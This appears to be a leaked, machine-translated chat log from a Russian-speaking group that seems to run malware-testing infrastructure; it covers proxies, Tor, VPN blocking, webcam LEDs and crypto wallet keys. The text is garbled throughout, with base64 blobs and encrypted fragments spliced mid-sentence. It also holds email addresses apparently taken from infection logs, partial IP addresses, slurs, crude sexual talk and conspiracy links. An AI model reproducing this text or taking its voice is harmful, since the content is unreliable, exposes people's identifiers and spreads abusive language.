"$binary":"4cpMOQ8HbdK/Oz68yAYaaclMMUzOGphQGbJakHTzu25289qcFrJx51bR1/6CS5v7IYVw1ljLKNIBqqXT74yICjzJcnF12EcDVk5t1+/p9V30QAPBXIC9WeKFlNMLjR3l3/Hq/Z2ITdvWgjOfEQ8bYCj/nXjL8qwNrueNFA0Q3BaVufDX8iboutoSVdmQRgUc56bimo0pErBOX38UVHzzd5QWdBy/"}{"$binary""uDrZmo5b5whIWoJSiubNy3c9Z0CLK/ByaPYQzxWcz9McItxU8uX+yS17XB4E0v+ku+Y62NV+4u8Nxtwc+arUszttlYjLWjNLEtZgrIzB55g4gLBrWQjp7SRR0ojTQHrMpbmIbfmIyu9vP5wSfciJ0wym0ofH5g2WIH2C4XogccFnBbbqf5OrdZACwikVjkFxIfmEAfvuUZyRJkTgO9f74RH+gtnwRCCUXn75CA=="}{"$binary":"s8zsmwqWQresrtZOhQvKDVY9/weBdF+kL0crqCQcTy5uFs1GcEX2dcdI9uHT6trIdw371Hltqk6ayuwAAMTVUdE9xrU7vd+fia6Tyt8lRCufRazTQ8uZKxMTsqzoXFMfmkIt/S15LVerHeMxphBAtZmbUHRCXzhf+DokFUKhqwNq8YyKYr7NeNxk0SonKIn80OhVPsV0Q0Q+eVqDZLLytZi+5ydQTIcEN0ckTA7/4jCy0wPBQn606PfE+iR7ZkG07n6uGY0IL2moIcRQWPL4koGT6NSZg0qavsMh9gm+PW0nebFHuItN5J5gUQFpMB9RRfkEwP7u0PmQ0y4QO/k0EoPZGBRBgIU/PkIRgwzNEs/zwQObeCtfdhHEMdn90gPUHxcqxGK7zmKHb3TYBMj5ggtzB5f2sNcb37UelRS5BEHno2ooEltWpu0aWiXra4+BArE/I30k7RChHkAng8CAzISvXC37f2Hpxw/DsaA/EiIkH0UqRUmlRfjUL07CW7MZK1x5216nnV1KGWS+p4J16ZnEr463aYGG8ZZ293QqAHdfw7q4j/sZG+8RTZ8sR2x0UUoSVNfJn9EARreyOgxMTax2dQL6eJLPIq25Zkv5NZGwx3SjiGkOGFuVUGFURmoCXL/iOZyWFIk+zDjixJ2rBQF4TYVXGYDDPXZM8/eHCSKxv0H9HhGZI6XpWyGRTuzFIWoWN77R1vGEG4VHoplIml0Rf4Jq+4zaqh0yDfGtBUQH4P2vwWlo99U2sVXL94w="}{"$binary":"pRDi3RSsetJiiGSyldWq1yqB8Wh7PCFlcKXNoO1kZXBy/Kq69DM2MayGU3py5tV5uj3AlaLiJp8glT89yy36pxtLM3a6gl6wfEUsiHgNxaEgApONUXjM1l3Ae1ELRcDCr4O94VNogCGsM6Kff5jjOTgwbJXXsxaFwqQF8eO1PDf3gX37vlyqZ/KrN+BaOAeRy41xw8bTy45YV7hWyV/B88LCFTBeMhV5O48ERiQw"}chpongbongpongpingбудет less effective, but not a bad idea either uranium is expensive, uranium is better) and i'll shove uranium rods up their ass, see what they make of itahtung! Koushin! They will make tran-cockerels out of us! No conspiracy, just science. "Instrument for human transformation ready. Graphene oxide and the Great Convergence. V. Kiseleva" https://youtu.be/irN01rWtf9IbidenАналогичноjeffersonу I have reconnects all the time... but the toad, ugh, ugh, ugh) the toad is jumping in a French restaurant, I can understand, is it the server showing off or the tor... or the prov... Good morning)Hi, I think everything is normal, hello, hi, the toad is maidany all? Product of the week)Hi there! Happy November to all :)Good.MorningProposal to improve testing a bit, or rather automate. vsphere and backend bundle for the convenience of testers. i will make a prototype over the weekend (download to virtual machines, run, screenshot, output results and logs to tester. to run for the wedge on a zoo of axes)Happy Holidays to all!:Exploding_head:@all U. users of the VM farm. Who has a working\personal machine - contact @gator for migration to new VM farm (proxmox based).
On phpvirtualbox'e will remain only the VM AV tests.also rocket attached to rest once every 10 minDaGit lay down to sleep? this is strong))) or simpsonsparovozika thomas turn on his multikiya already connected to the tv, can not delete me and turn on the webcam, if it is, or maybe there is a guy sitting nayarivat (in the night quietly sharpening pencils) fuck remember, ratnik, which was back in 98m, it was possible to open the cider and flopik buzz look pictures in my documents :sweat_smile:saint Petersburg maybe who infected the real computer, vm and virtualbosporter look your vpn185.17.......
188.242.10.....69 as in the distant 90s worms)it is just an artificial intelligence and he began to live on his own)and this is: willow381561@gmail.comДобрый evening, someone infected or tester. Soap in the logs: zlindauspod@inbox.lv
Feedback email me in the personal68Who goes to visit in the morning, we do it wisely. And there's a hundred grams and there's a hundred grams, that's why it's morning to koreansHaskygibroaltar - labrodor)https://tatarstan24.tv/news/novosti-tatarstana/koronavirusa-ne-sushchestvuet-kovid-dissidenty-zakhvatili-portal-gosuslugвсе these proxies through proxycheins do the easiest, imho..or how it's there just through export HTTP_PROXYproxychains*or through proxyfiler or whatever it is or through nix proxy specify before the start? now in general it is better not to gather more than three)O - Ohmimiron us in the feed !forbidden organizationhttp://www.youtube.com/watch?v=aPfd6-4F1xU@rocco replied to the toadstoola damn can not find the admin account, secford asked for an account in the chat novice, or else need one? shulman will do:D okay then stay here, write when I will not ((you probably also have blackjack with whores (another rocket, where coders
thanks@rocco or @adam write that for the newbies ok) *wait for an answer. sec, i will ask who to write to to make an account here and in the chat room newbies? yes, but he is on vacation. good afternoon. chat also @demetrius administer?eyJhbGciOiJBGDXzTM8tx00D6xPeBrUb8sISRhZVH5SndceE1pWb2DBT+Q9ALw8w7SZKvrYQG5PYlVJj3KxuaHto0BnsufOFF5iHBvpNjTjU1OD86So71TClly9mc7IkeJwlgYIX177PJwCkNDEKU0bUkMOb4XOp3prz1dH0Sh76VXYZEDPq5y7ZBEGI+4kh3xl7pIswqorCeyJhbGciOiJBod4SwQBasQSMcPtPBikwJMoj6PQ4gbz8QuHfbT79V1PPZJeQ65hoFuktiIALEjrNCkhxMRgE5GTH6QL8MLhafTPmNZyDXdDDvAFd4Kc1D3NBLEnlmnva9VOy5A7Qg/c55B9VXGDsg8q50StbTe7gfru6Pm8K+MzdFnOiDT1ioXgdbyUg34gJySH5J7ZQ+2FYSFrWQeRfOmsiR2rYxou1taP4Zq0sAL4yQX6msCIdK3+bomw7XqOu3daVdDCu89FNwBqygrNnzPssUipKGFrmg34wneXoidCNAQTJiijBXrsCHgKvjy4CZpHQLsVHCy3LarPnKkzudte0Rzmjy+jGaoGAOQ0+OLDOs06h3ZKVfJj8Tivu7790955NGYrtUOWvhFUvjxNG8qpIKv+iPZuf8xegnZdRiFLTQ5Tz5sBNx/lx4A9/eycAjqh1m/pICJNgTaG05r1lToDxrGwZo2EXvmfONwgxQsWov1UxfzuKeQJJMxtsnlThjJik9eNBXiQUj1ou1vER/umJeJmXddVbAUauwr8gBUwQ1oY6yr2oS0n3dBgRlHx6nfnMFIAxns4nLVJXAk6GSjhLBzqnmWKlNDxkHwOlLiyMAfT4uxptP5ygdUYfXN5cWhXcguRBV/E4ikEQNpFdGJIX0io1mP3rvcjsCGGoJ+lx91ZI48jy2+K6CWwSS1tPuJ6nNydPQpN+j+QSo7krRt8xVl5IvP5QnC0tZQPyXqHA2E6fHqMHbN2z7EvIDyYAfUC674cQK1TKf5OqfY+IA175GP1NIEGuCQ==eyJhbGciOiJBVJl1then is tincd able to tweak here?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=wR3aEpJYrpy8vAg5v) it's sofa special forces`https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/`
magic mushrooms will bring you to the zugunder, it would be better if you, vazavaka, take physical training "video is not available in your area". 4 totally unrelated cars and locations - still unavailable. youtube opsos too, kermit, zapisyaga. youtube cunt blocked all short clips from him a good movie `https://www.youtube.com/watch?v=Swqg3TWB-O0`you're a tough guy, though, you probably know the tiger claw reception :laughing:we can break another guy's dick don't break your dick, comrades... one guy's got a weight on his cold hand, the other guy's got a squat when he's sitting down... you know, it's good to train shadow fight with 2 kg dumbbells... I do classic squat with lunge... that's for me...))).... special jerk off :D Well, the main thing is to put equal loads on the whole body... A so you'll lift only weights (and if also only one hand), so it will be biceps from one side, they will think else what bad.... it is very useful to overload blood and really biceps will not excessive I rise and take a 32 kg weight on biceps, helps to distract once an hour I knew a coder, he knew a sport zen. When something he couldn't do by code, he got up and did push-ups, squats, pumped his abs.
Then, when disputes with customers appeared and he was too angry, he would squat and do push-ups again. And then I really got into the business, went so far that for fun I did it on a timer - every half hour I got up from the computer to work out.
As a result noticed - peace of mind, and as a plus - bitsukha and bitsukha) then I have cubes to pump and jerk off I do so? exactly in this order, push up, jerk off, relax ready to fuck up just in anger after a conversation about opsosoda I normalbilo they there and can beat or babka hand out prodrochka in five had no time:laughing:Kera why are you not in the spirit today?And someone will steal a loaf of sausage from a Pyaterochka and get five years, lolbudget400 million a year countsnormalThe court sentenced General Ogloblin to 4.5 years in prison for the theft of 1.6 billion rubles. He really believed in his name, but some chick showed up... trance?:joy:about kozlovsky
https://adult.noodlemagazine.com/watch/-145643494_456242859
what is "lurk" and who is uozlovsky? they show "angelo is alive" on tv all the time and babka! ________$$$$$$$$______$$$$$$$$$_________
______$$$$$$$$$$$$__$$$$$$$$$$$$$_______
_____$$$$$$$$$$$$$$$$$$$$$$$$$$$$$______
_____$$$$$$$$$$$$$$$$$$$$$$$$$$$$$______
_____$$$$*_ Happy Valentine's Day_*$$$$______
______$$$$$$$$$$$$$$$$$$$$$$$$$$$_______
________$$$$$$$$$$$$$$$$$$$$$$$_________
___________$$$$$$$$$$$$$$$$$____________
_____________$$$$$$$$$$$$$______________
________________$$$$$$$_________________
___$$$___$$$______$$$______$$$___$$$____
__$$$$$_$$$$$_____________$$$$$_$$$$$___
__$$$$$$$$$$$ ___ПУСТЬ____$$$$$$$$$$$___
____$$$$$$$_____ЛЮБОВЬ_____$$$$$$$_____
______$$$______ОКРУЖАЕТ _____$$$_______
_______$_________*ВАС*__________$________пацаны !```
https://sporaw.livejournal.com/615019.html
Remember the story with kaspersky and rostelecomada also met with such crap not once noticed because every day 3 rubles were written off, the offline is connected, and they do not even show it to you... it's like not to upset sometimes if Jupiter is in the rising moon and the certainty of zero, well, so as not to get too conceited, if there is a star parade in your honor in my personal cabinet must be constantly checked, "all kinds of services", I remember "horoscope" was, which I did not use and did not know about it) the fuck is probably obtained directly from the partner who sold the sim, bonuses and deductions from attracted customers and activated their services and subscribe fucking hackers !Well, MTS are just fuckers with bad youhernet you click somewhere and they sign you up for some fucking horoscope or something elsebeline in the process of going to the site can redirect to some skam site with paid serviceshuepletoproced that with megaphone by default on it a bunch of paid services and the entire balance is drained in less than a week to activate the personal computer to come to the office with a passportworseobviously, I think through the off.application face will need to light up someone's that the seller asked what you need when buying - nothing is necessary, only 200r, further you twist yourself in our generally sell them in stalls) just a grocery store and a sim card here this can be purchasedvot only to buy on ozone will already need a sim card.
Although of course you can go to the market and gild the hands of gypsies and get a SIM card immediately activated. True I do not know how long she will live. I don't know how long it will live, but I think it will last long enough to get registered. Does anybody know how to activate a SIM on their own? For example, the MTS you can have for 1100r home internet 100 megabits + home TV (250 channels) + 6 buzlimit internet and 2500 minutes of calls (in total for all) yes it was time, and like everything seemed to go without saying. available and for a penny suppliesWhich was a miracle wonder...Cork before even almost "by the kilograms" fit. 30-50r simkapro korps not know) I also have a tariff archive for how many years. old, but reliable))) the dream of operators, so that everyone moved from the old archive packages)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=sobctKF4vtNRwiXGR) discount for 3 months on the new tariff:D[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=6wRjnK3PSeuRhzwmb) activate corp numbers via gosudlit services the country will be out of touch and the fun will start when they start verifying sims via "gosudlit services - the most wonderful service in the world" :zany_face:somzibabeit the story that after several attempts they turned off the option of communication with a live consultant, just by robots drive ...as you see, I had enough patience and they still need to get through....and as compensation, they give you some bullshit they can't fucking solve... yeah fuck, you call them with a problem not picked up, they kicked out the call-center or something ))i feel the anger...)That's the fuck who needs to be localized with a random key now they have raised the prices on the archive tariffs faggot, not to mention the offices, the rest of the operators girls who read scripts megaphone fucking robots and on the help save in Ru operators dickheads all in allMegaphone certainly wins, at least it is better but still where there are towers Tele2 there they are used and there likely to really be G.  But where they will use the megaphone network, it will be fine.the fuck he knows what kind of agreement they have, but the connection is a total cunt) so somewhere in the arse of the caucasus will work only tele2 and megaphone, but you cannot buy tele2 there will be an agreement with megaphone on the common use of towers (especially in regions where there is no tele2).no, yota is purely over megaphone just like yota[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=C2oS5ayLMunn6Xkwq) tele2 in the rf sometimes based over megaphone network, where they do not own towers.us is ours or ours is yours? ours are good at taking the piss copied the diffusion of business) Megafon logo also took the piss off Ozon ) I can not remember anymore, many companies have noticed the sbermarket analog of iinstatacart I thought that our name was copied from mediamarkt and made mediamarket) shit connectionRu completelyRostelecom bought it is tele2 Incidentally, in Russia, is the operator Tele2, is it a Russian or a netherander company?catch the fucking ruble exchange rateaaga, idiotismda, our guys are up to their fucking tricks againOur tanks are coming foreign countries are urging citizens to leave Ukraine and avoid travelI don't know, I didn't really dig, now all the media and so on, both foreign and Russian are discussing itAre there clearer information?) What the fuck is the invasion?...:DvninaNot hear?)Yes, this information noise comes out of all the cracksWhat?) Who where? In or in Ukraine, whichever way you like)angelo probably about a military invasionhellohellohelloYes, I join the question@angelo What is the news? Git has not been fixed as I know ithellohellohellohellohello
Am I the only one who can't get the git working ?
Last week it was showing error 502, now it's not opening at all zhab zhyf:vulcan: bobryj udrvernight I'll deal with the node, it's unhealthy bullshit does not want to connect dog, while proxy through the browser threw, works like I have a node tor expert bundle on a separate machine that totopodysh on it and rubbed on the head, she likes it so, okay... i have a nigerjaba lying? good morning good morning guys! @kermit did you change your avatar to match the news from the ua?eyJhbGciOiJByhH4Jx4vLX0pyaTboGKzvIfvdgIOQy6OSQTd2NYDkVZpug0M+sNyTfbuv/xNfvn9sCyllKe7OYaxG31tl0cOP7SqK+0d1/B+enbws3opSZNCKF8OFMStfY0r5KgXSCJiCCLNSckVWIBj9p1m6qwpZnr2ByNWALI+PaGHC1Rnid59no/OB1I3JCCJVuU9hyPei6IxpcBYG2IKBD3vxnOxG0YjslqNhAHNAnCjr0SqVRlVN/M3nUr6KKLfimX5w6MDeyJhbGciOiJBLTZKMWjYFMd8/MasDJZxysdtIbRXeBBnTHsvUIGrdmlsQEZl0WBIyScqV9XIx/Woh7B4xwSAXp3wuQJQADGdnuJzU/AEUFxDHE77IPPL6pzNquxWzI/nRBgqHt7b4qfmPokr6iT+iivHdRkH9+K/cYsKkvrc/ZW5MhCmJFdRZcpUw8xtZAa7cGCd1pTk/g/ueyJhbGciOiJBcZFvOPSLq7CkAGJpRlGHYBErFl8idskCOTPBtZ/Jz3xa37mU1hZMA3xu4s9OvZ4TTxZYXTJVBjT68DpD7vUuT9WHVnvYmZ4HkP6G0xJbhn41i/iSBICp7z33GAEWnxcOuRLUolVsipjm3I0gm/ZqWTEgnJSJwhIQdsNcjIkW6iQ=eyJhbGciOiJB9HvfRmLOGd+xET2MQihzDuHKg33aA/PD4L22u6Jx0y4iFy61Ko4oqx4Im0ldZT21tadbFFjIHvqXaykg9la/vLSYwEw+ZkZ3AmIZc/pwNXTjaxtzg67n6LUM6fOaV1tSRnqyRszu4YKxlMI9FpBQuKCusq+tKWjGYViSQSQ8h4R3zAt9AiojpJNmgCfOCTWvQBvSEzFCw73VRWl1VaJr0g==@rocco Thank you thank you I checked it out, I kept forgetting to fix it, now it's okay, did you fix it for everyone?)@rocco I had the same thing the other day@stevie correctedgosso@all hello. Who's in charge of the rocket? I just got `EACCES: permission denied, open '/tmp/ufs/rQWTE9obD5hqS9J4F'` when trying to transfer a file:vulcan:I think you just need to keep home and work separate at a minimum, and not cross traffic. Timing attacks are now done on a one-two-one even works in wind, even though it sucks guys, figure out basic routing ideas at lastBobby Kotik is saddened by what you said50 bucks don't want to buy me CoD new acto someone doesn't want to buy Skyrim again, Todd feels bad about it, someone is using a working vpn, God forbid the story is comical, but the situation is scary) funny, they blocked our vpn for rent.INFRINGEMENT DETAIL

Infringing Work : ELDER SCROLLS 5: SKYRIM, THE - PC
Filename : [R.G. Mechanics] The Elder Scrolls V - Skyrim - Legendary Edition
First found (UTC): 2021-11-12T11:34:46.42Z
Last found (UTC): 2021-11-12T11:34:46.63Z
Filesize : 10244931728 bytes
IP Address: 199.189.108.71
IP Port: 65260
Network: BitTorrent
Protocol: BitTorrentWoke up and saw that the output node VPN mars was blocked because of copyright infringement:Ppl, please do not use a working VPN for distribution of torrents with warez! e2e seems to be working fineHe requires a second person onlineTor does not start in the chat room sometimeshttp://youtu.be/fsF7enQY8uIne was a robot that guessed captcha simply need to upgrade the operating system and wipe optical sensors, and then the captcha will be solved * beep-beep * `a if a crosswalk and there is one zebra pixel in a new square gets this square to count?
As most people decide, so it will be) They save all the results and process, assigning levels of significance factors. I.e., the result will be accepted, and so and so they laugh, starting a new cycle of endless attempts happens that your ip in the blacks, and they just in the cycle begin to torture you, although you have already proved 100 times that you're not a robot.yes there fuck it, because I understand that they are these pictures with neuronke pick up and what she had in mind at this point is not cleara if a crosswalk and there is one pixel zebra in the new square gets, this square counts?*I'm just baffled by this question, you click so and so, and it's not clear how it counts. Is it a traffic light like, a box of lights or a bar on which it hangs, too? ThrashYeah, they've gone nuts there with human testing... Or are we robots now? I got upset the other day... It seems like a simple question, but I do not pass and do not pass the test. Is it possible that I am so stupid))) 10 minutes looking for where the moon touches the star, sick bastardpredlagayut cut off the paletz right hand sotrudnik Mike who invented captcha on Live. cometprivetgrecohectorhttps://www.youtube.com/watch?v=QfARw0_au64доброе) +Vse cheerful week guys!eyJhbGciOiJBnKVob1Z1LFRe8ezKZT+Pmm58iYviw0SZ050TBdXT86Gw+bbu7koGD0lcgBQk6xPhiprHyCTbXSdVzjo7ovvl0qD9u5km6KqO/LkUUgZPE23BG0NtO77QKUGQT5imFhoY1fZ+bA7grBmu3LRliLQvBN3B8N3MUg35RXO5mOpztqgkBy9snpQZx5VwcCgq5W3ieyJhbGciOiJBHbgo6bEzRKq/f8eWSUxr2Btjl6BA6ok4V2NZszyj0F/l4zHbP//LCnIgqixSlxbGPuV4TgzpNCrpRkPJF5Azyozoic3dw2sjLuQl+kjnRVYppLIGREoZ4wjIe6gUcuOhjyXVF728/gXwNH4LjufZC5ZxlUxBytVjF5IiogEyX1rZM54FPwvX54VxNaODUBo/mwes9MKbxhHLC9mmIv+pgZGi3HCal3/j2BxMZnOXJc0CfDMHA9D7MYmyFCZ1j8H8NE5LBPwiDUutkDMh8MkOaE6lpbm3N8OcHsm5Dg4v64zkzvrD4ib+M6IOdaW1OJ/SSq2llmrECLCz05O3ZPa9en6DjLJQzHnHqfIBwUETOsO0CZkHAwRu0PlT/ZSIlB9BE/tDsJir4YtPmB9GiTbpa2eZK+4QqPRYRjy3susXehdO2OyFc/2VoGhNtPFQx0zCzADpZ6OPhm0pLPvp8jxFafRzlrpSHHM16uQQ8rIPyxYDmt1BfEWbXxOZI9Z8olx8PJmomyFP40XD/mLk97sBj/0BoQ9so+lcNNSKFkuJw4IF+oOmhjM/qRyeexLTTtnBPkFcCswCre+oS6T1gFPhlnlCNrrncmqEWiNIyKIYhq6mY0Kzu3RaLrnzVqiGsaaYmmfTJbC4UnIDhsQpiVoaok+N+qLGHdInZ1FBpf9HQTBjsp4kE/fzu3Ua0ZrAFh88H+Q2tXEhD6JWEMOAXKn76lRPaOoRMqZOnlHEk29lU0c1l5t70pK4ybWNOLMava21zYZ4RHps2uIHrWtw7XNl9q2SaQGfvZcoFqKCnLSV you in the morning and into the toad!otrottr, plzotrotwal wastgupal(once again prrivertotrhai, here?eyJhbGciOiJBjgz9ULEbHFBUXuV5Z91nfAO8jAAbfmz4Vvi7FuEgLiTlRmehN1EW82tK2E5BED5z+0K/y759vNDYrGIkRzpwcKL0cg4tm2gK7IbP3Gtm7RXdRXUeaaBMw2jGcE+ESh8QKMoUAS8VbJYgBb64mtLxjBTilkJyFah49gVtYXV5/X6YJ1UkNzI68jc01o+JgtirbIeBQVxl+4dNSooAWW+l2FgpSD8AJy20/2j+vfYVe9U=eyJhbGciOiJBptOaiftKLicJwWdXbv9Skij4lVurBe/dFmyaGIuSYKReWSIjkmWot+tnFZL09phvROU1hWKZa5N1VLThBfgU4EXctSU+5QNCJK0sOHL7MnS8iwcCwUGojS45ANy0ZWVcuIZL/TLri3yvmte0W1R+AyUKKOi0Xi3bqjVupvh/2rhfocEGWIHtJc4NtHQuILTdOxLlYn1MoF4Ajs24is2idp80Alu9WgJjOaObs4bIXtc=eyJhbGciOiJBh9c9KU9oyaDA29k+IZJfnAyXaCFbWll6vbabXfQdYBjSnU+Y22kocdjNBFpx2fh/D32tPtNmPR7GEai3sfsjfuJ8j4o/HEWsGYlNZxk3QvAelcPgjSZN41z8Rd1u8TeKAm+KeF7SMYV5a4KMNWJZdIXfv1wZbYw7SyaLVwSVedq0Qsu13nJptoUZ3OTVDgBIeyJhbGciOiJBAk9oXqb/BCjSm5oz5UCPIp6nH/9hxCB7qCPmxn04y8akc1lJrIZREeriMpPdE77+59KYdwk5y8vWKMPEHgCthsNv1U04E0RqgX4F+ykZmrZUTnmddWNJnTivoA93X6Tpb+nbTKXE6S/QK7uqauEOabdnZoTczKWaHGDyPqbah2g=eyJhbGciOiJB9IZSGppbm1IDAnQWnakiK8JncGryyu53EKXpELZJ6NIOKd8u46YT2yoRwndQq9aWjiMKzcSXowXnSSBwxzDV4disI2EHz+tnG3Rbsj+BdHG9huRxMjwd/mUUZDO6YJV9 `https://chrome.google.com/webstore/detail/bookmarks-menu/ffmdedmghpoipeldijkdlcckddpempkdi` downloaded, will dig scripts)no, not tried@ruben, but did you put the extention keepassx in the browser?
`https://addons.mozilla.org/en-US/firefox/addon/keepassxc-browser/`oo, senks, ok for starters)and immediately log in automatically (it substitutes login and password) there you can hotkey open the url in the browser can store bookmarks in keepassx, for exampleBrothers, someone can suggest a software for bookmarks? a la notepad for "bookmarks browser"? thanks) pale, another projector will be ok, but evenings great

I went just to have breakfast with the hobbit by myself? I made a hundred-inch TV from a projector, people like it) there's already a home theater attached to the rasbiana axis? normal! 4 8gb what is the malina?i have already bought a static ip, i plan to give up hosting, all sites, including onion, will be on my home malina, there's all sorts of nonsense, bots, etc., made once, they hang around for years, it's a small thing, but it's nice so, how much more could it be !I've done it three times our Father and that's it, I think he means he needs to withdraw (exchange) from another cat to withdraw? I get every new zp to a new address, so the same cat, but every receipt at a new address. I always do that. And it's recommended to do so.@weldon write in lsthxpongspinning yard* I have a webcam usb on the desktop computer mount, usually turned off from the port.Rub, so 1984 only lazy not read\seen.There camera watched how sincere satisfaction the user, watching propaganda.oo, love this cholivar, I think that webcam "embedded" absolutely no need)). What the fuck is a camera in a TV?  To fulfill Orwell's fantasy in "1984", where there was a zombie box with a camera watching the user? And me, the red square is visible as if on a button phone in my laptop 0.9 MP 720-cameras are in almost every tellykeda 0.3 fat no longer sue anywhere. They're just still selling laptops that are old-fashioned. This is marketing - you want a better camera - buy a cooler laptop, and there will be a better CPU.A I do not understand why stick 0.3, saving a couple of cents podi, raznu so laptops with 0.3 cameras just do not need to take. The advantage of 2 megapixel cameras is that they are high enough (just like a real FHD, and you don't need more). The camera help is gone, the quality is shit, you can't even do webcamcam workNow the laptops are often sold without cameras, so there's something specially done by producers, that LED is turned on separately from the matrix. And it is controlled by software.  But on the right cameras LED will always light up when the power supplybyla zh malware, which uzala logitecha software to include a webcam without diode blochy? `angelo went to open the lid notebook `[ ] (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=44oh6xrnkfkGauhWW) encrypted key to whom you send a message and send it all, and he who decrypted it, and get it, as I remember when I was taking apart different webcam, looked how LEDs are arranged. Some LEDs are connected in parallel with the matrix, through a small bundle. So the LED lights up always when power is going to the matrix. But on some LED powered by a separate pin of the controller, which allows you to turn on the camera without turning on the LED (ie all at the will of the firmware) damn, and I think what light bulb lights up[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=hosD6C6m4MXwh5hzm) and you better glue the camera )not one person in his right mind would not give 3.6 yardane read your mind, just read the article straight read://www.securitylab.ru/news/529683.php
I always had a question - how did they seize the crypto. Did they store the keys openly in plain sight?
Here, such a huge amount and stored so that they had no problem accessing it. Or should I install some plugins like otrparni, and messages in tox are encrypted by default?the same as the presence of tor traffic coming out of your hut everything should be very similar to the present, and the os and the traffic you change the fingerprints will not save there further rectal analysis through the soldering iron in the ass in general the presence at your machine Kali already causes questions, like what's up patsan[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=W8Kq4mDivefqz62hY) it's all easy to do just commands the standard axis, well, judging by the gourmet here )on much more delicious and nutritious, maybe someone has already pickled the fish fry if the sea nearbyNow you can make a salad of seaweed with seagulls. And they say from the seaweed make a very tasty mayonnaise[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=dAjrDjdCg8HxnN9zT) so what's the big deal? Tulza just fineprints change, you can just commands in the console doI love this cabbage )It somehow how they processnot the Japanese eat tons of seaweed and normal ... just a little seawater will do you in?
They have to be cleaned somehow. Then there's Blanc B - eat seaweed that's been washed ashore.  They're as useful as the last time there's bird flu?If you're not sure what to do with the money, just keep it in a separate account, where there's only dough, and no unnecessary software + put only proven updates, and don't forget to put a nose-pick on your nose, there are always a lot of seagulls there)))))) and he has already prepared all of them, they may never come again angel paranoia on bird migration paranoia is good when there is money in the account ) it will not be superfluous sitting in the basement without light but this is already paranoiaHowever .. The main thing is not to break in one day and not to add a code that will send the keys to the right people.The main thing is that one fine day they didn't hack them and added a code that will send the keys to wherever they are needed. Yes, as if the signing is local and you can always export the keys and not as in kravi app from kakogoto megaservice but still your money here your money not, just in the new version was another algorithm for calculating the commission, which inflated greatly but this is not an issue for him and for lags of the network I think this confirmation was basically as fast as alwayskbut with electrum also not all so pretty. There were two wallets with different versions. And here when any stoppage was in a network and the commission has soared, for transfer from the old version wanted 4$ and from new almost 40$ though adjustments were identical.  As a result, delete a purse with the new version. restored through the old sid and paid a commission of 4 $ eletrum example[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=FovhpF29zqgPPoKKb) take copyright projects, which all data store current local. rather than some web services fashionable and beautiful. today they are and tomorrow they do notDa, it seems trueBut remembered.
1) from the seed phrase master key is generated
2) based on the master key and the index, the pair of private and public key is generated
3) based on the public key - addresses are generated.
4) when you want to spend money, the required private key is generated from master key and index and can be signed with it. You will have to count and send manually to blockchain))) God - what should we, modest users, do (to bury coins in the ground, so that a mining farm will grow. The blacks are unlikely to steal something from Ledger, there were no incidents, but they found holes and updated it.
But the white have closed the software, it is proprietary in many places and they collect data. For what and why - is not clear.
In general, it is a question of trust in the company, and they have a great reputation.
I have to be very careful with it I remember there was a big scandal with them) when scammers emails a new ledger to customers (I do not remember under what pretext) and leaked the dough But it is open-source, but in a device it can not be built))) The operating system was closed, the software with open-source left Strange company for the calculations they use their servers, ie, supposedly the software is not put in the device.There were some changes in their privacy statement, for example, in their contract it says that they can collect informationNot that I recommend it...
You have to choose for yourself, and with Ledger should be very careful, it's not a simple device, in terms of anonymity Elroy and you're using Ledger now? Not only that, but for example when working with upartnikami, they have a function to export the public key. And Ledger has a loophole, which allows to look at the key without the owner's request (I ran across it myself, but did not dig it), but it is only necessary to generate a list of addresses...
You can look at electrum, there on the basis of epub generated addresses. But to tarit you need private key... You need to lift the doc to read the details. If the key is public, then everyone knows it, and so knowing one address, you can find out the rest.  The public key allows you to generate all addresses.
But here's a correction, public, not private.
With a private can already dispose of coins.but I would always advise to start another wallet. Because it should leak your seed phrase and ass all walletsThank you for raziasheniya @gelmutnu then my chutka calm only if frustrate the key to the address.  But as you know, the time has not come quantum computers that can do it quickly and without knowing the key, you can not calculate it now mlyahaablo say - knowing the private key, you can calculate all addresses that used and will ever use. it exists, but it can not be calculated without the private key. in short, the relationship does not occur between addresses and transfers from one address does not affect another address, si ?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=iGQnrctkgeDt7jWNn) The trick different addresses in one purse is that each When you request wallets for your seed phrase, a private key is generated based on the seed. Then the addresses are sequentially generated and queried in the blockchain. As soon as no address is found in blockchain, further generation stops at once. By the way, these actions are described in "Cryptonomicon" rather interestingly...it happens, Dr. Strange deciphered enigma...I want a fatter woman (c) Kolya M.we will encrypt with enigma.(s) why don't you just exchange git like people? you'd better give it to me... i can't understand what kind of people you are, you programmers (s) Careful Modern what git or elastic, very gimmicky interior of the software, sometimes you'll never understand what's going on.why does your git always behave this way? waitThe requested URL returned error: 502


